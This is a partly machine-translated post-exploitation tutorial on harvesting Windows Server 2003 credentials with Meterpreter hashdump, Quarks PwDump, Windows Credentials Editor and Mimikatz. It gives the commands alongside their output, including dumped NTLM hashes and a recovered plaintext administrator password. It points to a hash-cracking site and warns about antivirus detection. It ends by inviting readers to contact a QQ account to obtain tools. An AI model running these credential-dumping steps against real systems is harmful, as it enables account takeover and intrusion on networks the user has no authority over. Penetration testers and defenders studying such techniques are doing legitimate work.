Preface
The systems captured here are all 03 systems.
hashdump to grab password
Extract the hash value from the target machine and crack the hash value to obtain the account password. The user name and password of each account in the computer (if it is a domain server, each account in the domain) are stored in the sam file. When running, the file locks all accounts. To access, there must be a system-level account. Therefore, to use this command, you must increase the privilege
. Enter the hashdump command at the shell prompt to export the hash in the sam database of the target machine
meterpreter > hashdump
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
ASPNET:1007:4274ebc980bc50aed4a6c053eb6761b1:326f3aae7bd9312f6b32afafec858d53:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:ae694413fb708add0aa8b1b47358ce92:::
Another module, smart_hashdump, is more powerful and can export the hashes of all users in the domain. Its workflow is as follows:
- 检查meterpreter会话的权限和目标机操作系统类型
- 检查目标机是否为域控制服务器
- 首先尝试从注册机中读取hash不行再尝试注入LSASS进程
You can crack the grabbed hash with violence or rainbow table: http://www.cmd5.com/
Quarks PwDump capture password
A tool for exporting system authorization information under the win32 environment. The supported operating systems are xp, 03, win7, win8, 2008, etc. In the Windows password system, the password is stored in an encrypted sam file, and the account is logged in The ciphertext and plaintext of the password will be stored in the memory of the system, which cannot be read under normal conditions, but can be read by Qp
直接运行Quarks PwDump.exe
-dhl:导出本地哈希值
-dhdc:导出内存中的域控哈希值
-dhd:导出域控哈希值,必须指定NTDS文件
-db:导出Bitlocker信息,必须指定NTDS文件
-nt:导出NTDS文件
-hist:导出历史信息,可选项
-t:可选导出类型,默认导出JOhn类型
-o:导出文件到本地
Here use this tool to grab the hash value and export it, you can enter the command to export the local hash value to 1.txt in the current directory
QuarksPwDump.exe --dump-hash-local --output 1.txt
windows Credentials Editor grab password
Windows Credentials Editor (WCE) is a powerful Windows platform intranet penetration tool. It can enumerate login sessions and add, change and delete related credentials (such as LM/NTHash). These functions can be used in intranet penetration, for example, to bypass the Hash operation on the Windows platform or obtain NT/LM Hash from memory (also available from interactive login, service, remote desktop connection) for use Further attacks, and the size is also very small, is an indispensable tool for intranet penetration. However, it must be used under administrator authority, and attention must be paid to the anti-virus tools.
First enter the upload command to upload wce.exe to the C drive of the target host, and then enter the wce-w command under the target machine Shell, and the password of the system administrator will be successfully extracted.
meterpreter > upload /root/wce.exe C:\Documents and Settings\Administrator\桌面\wce_v1_3beta>
The default use -| command to read the data format username: domain: Im: ntlm (this kind of reading is to read the logged-in information from the memory, rather than reading the information in the sam database), the default reading method is first Use a safe way to read, if the read fails, then use an unsafe way, so it is likely to cause damage to the system. It is recommended to use the -f parameter to force a safe way to read. The -g parameter is used to calculate the password, which is to formulate an encryption method that the system will use to calculate the ciphertext. The -c parameter is used to specify the session to execute cmd, and the -v parameter is used to display detailed information, so that you can see the luid information , -W parameter is the most critical, used to view the clear text password that has been logged in
-c参数用于指定会话来执行cmd
-v参数用于显示详细信息
-w用于查看已经登陆的明文密码
-l读取从内存中已经登陆的信息
-f强制使用安全的方式读取
-g用来计算密码
Mimikatz capture password
Mimikatz is a lightweight debugger written by French expert Benjamin Delpy (@gentilkiwi). As a post-penetration testing tool, it can help security testers easily grab system passwords. It also includes Kerberos login credentials that can be obtained to bypass It supports functions such as Remote Terminal (RDP) of Windows 8 or Windows Server 2012 in RestrictedAdmin mode. For most of the time after the initial penetration stage, the attacker may want to gain a firmer foothold in the computer/network. Doing so usually requires a set of supplementary tools. Mimikatz is a kind of Try to bundle useful tasks together. It should be noted that this tool cannot be used under Windows 2000 and Windows XP systems. Metasploit has integrated it as a Meterpreter script for users to use without uploading the software to the target host. Mimikatz must be used under administrator authority. At this time, suppose we have successfully obtained the Meterpreter Shell of the target machine through a series of pre-infiltrations.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
After obtaining the SYSTEM permission, first check the architecture of the target machine. Although Mimikatz supports both 32-bit and 64-bit Windows architectures, if the server is a 64-bit operating system, after using Mimikatz directly, Meterpreter will load a 32-bit version of Mimikatz into the memory by default, which makes many functions invalid and in a 64-bit operating system You must first view the system process list, and then migrate the process to a 64-bit program process before loading Mimikatz to view the plain text of the system password. There is no such limitation under a 32-bit operating system. Enter the sysinfo command here
meterpreter > sysinfo
Computer : WWW
OS : Windows .NET Server (Build 3790, Service Pack 2).
Architecture : x86
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
Load mimikatz directly and view help
meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > help mimikatz
Mimikatz Commands
=================
Command Description
------- -----------
kerberos Attempt to retrieve kerberos creds.
livessp Attempt to retrieve livessp creds.
mimikatz_command Run a custom command.
msv Attempt to retrieve msv creds (hashes).
ssp Attempt to retrieve ssp creds.
tspkg Attempt to retrieve tspkg creds.
wdigest Attempt to retrieve wdigest creds.
The mimikatz command option allows us to use all the functions of Mimikatz, and we need to load a wrong module to get a complete list of available modules.
meterpreter > mimikatz_command -f a::
Module : 'a' introuvable
Modules disponibles :
- Standard
crypto - Cryptographie et certificats
hash - Hash
system - Gestion syst�me
process - Manipulation des processus
thread - Manipulation des threads
service - Manipulation des services
privilege - Manipulation des privil�ges
handle - Manipulation des handles
impersonate - Manipulation tokens d'acc�s
winmine - Manipulation du d�mineur
minesweeper - Manipulation du d�mineur 7
nogpo - Anti-gpo et patchs divers
samdump - Dump de SAM
inject - Injecteur de librairies
ts - Terminal Server
divers - Fonctions diverses n'ayant pas encore assez de corps pour avoir leurs propres module
sekurlsa - Dump des sessions courantes par providers LSASS
efs - Manipulations EFS
We can use the ":" syntax to request the options available for a certain module. After selecting a module, we can also use ":" to view the help of this module. For example, the available options for viewing Hash are Im and ntlm.
meterpreter > mimikatz_command -f hash::
Module : 'hash' identifi�, mais commande '' introuvable
Description du module : Hash
lm - Hash LanManager (LM) d'une cha�ne de caract�res
ntlm - Hash NT LanManger (NTLM) d'une cha�ne de caract�res
After knowing the general usage of Mimikatz, we can either use the built-in commands of Metasploit, or use the built-in commands of Mimikatz to export Hash and plaintext certificates from the target machine. Then directly enter the msv command to grab the system hash value.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;202037 NTLM WWW Administrator lm{
44efce164ab921caaad3b435b51404ee }, ntlm{
32ed87bdb5fdc5e9cba88547376818d4 }
0;996 Negotiate NT AUTHORITY NETWORK SERVICE lm{
aad3b435b51404eeaad3b435b51404ee }, ntlm{
31d6cfe0d16ae931b73c59d7e0c089c0 }
0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)
0;53201 NTLM n.s. (Credentials KO)
0;999 NTLM WORKGROUP WWW$ n.s. (Credentials KO)
Enter the kerberos command to grab system tickets
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate NT AUTHORITY NETWORK SERVICE
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;53201 NTLM
0;999 NTLM WORKGROUP WWW$
0;202037 NTLM WWW Administrator 123456
Enter the wdigest command to obtain system account information
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate NT AUTHORITY NETWORK SERVICE
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;53201 NTLM
0;999 NTLM WORKGROUP WWW$
0;202037 NTLM WWW Administrator 123456
Then enter the samdump command to view the available options of samdump, and then enter the mimikatz_command -f samdump:: hashes command to grab Hash
mimikatz_command -f samdump::
In addition to grabbing Hash, Mimikatz has many other functions, such as using the Handle module, list/kill processes, and simulating user tokens.
Need tools look here
It's another simple and fulfilling day! Those who need tools can add me or chat privately.
QQ: 3075999532
public number:
